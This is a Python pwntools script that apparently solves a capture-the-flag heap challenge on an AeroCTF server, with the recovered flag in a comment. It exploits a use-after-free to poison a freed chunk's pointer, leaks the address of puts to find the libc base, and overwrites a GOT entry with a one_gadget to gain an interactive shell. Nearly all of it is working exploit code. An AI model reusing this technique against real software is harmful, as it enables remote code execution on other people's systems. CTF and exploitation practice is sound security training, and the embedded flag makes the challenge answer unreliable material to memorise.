```python
from pwn import *

r = remote("tasks.aeroctf.com", 33087)

def sell(ns,name,cost,hc = False,cs = 0,comment = ""):
r.sendlineafter("> ","1")
r.sendlineafter("name size: ",str(ns))
r.sendafter("name: ",name)
r.sendlineafter("cost: ",str(cost))
if not hc :
r.sendlineafter("]: ","N")
return
r.sendlineafter("]: ","Y")
r.sendlineafter("size: ",str(cs))
r.sendafter("Comment: ",comment)

def delete(id):
r.sendlineafter("> ","2")
r.sendlineafter("id: ",str(id))

def view(id):
r.sendlineafter("> ","4")
r.sendlineafter("id: ",str(id))

def change(id,name):
r.sendlineafter("> ","5")
r.sendlineafter("id: ",str(id))
r.sendafter("name: ",name)

r.sendlineafter("name: ","lys")
sell(0x10,'a'*0x10,87)
change(0,'b'*0x10)
delete(0)
#r.interactive()
change(0,p64(0x4040E0))
sell(0x10,'a'*0x10,87,True,0x10,p64(0x404020))
view(0)
r.recvuntil("Name: ")
res = r.recvline()[:-1]
#print(res)
#print(len(res))
puts = u64(res.ljust(8,'\x00'))
#print(hex(puts))
libc = puts-0x74040
one_gadget = libc+0xe664b
print(hex(libc))

sell(0x20,'a'*0x10,87)
change(1,'b'*0x10)
delete(1)
#r.interactive()
change(1,p64(0x404028))
sell(0x20,'a'*0x10,87,True,0x20,p64(one_gadget))
r.interactive()
#Aero{13f96a24f185f0862ea1ecd88c854b12d5a4b7ba85b43dc42e0bb2d187a2ef9b}
```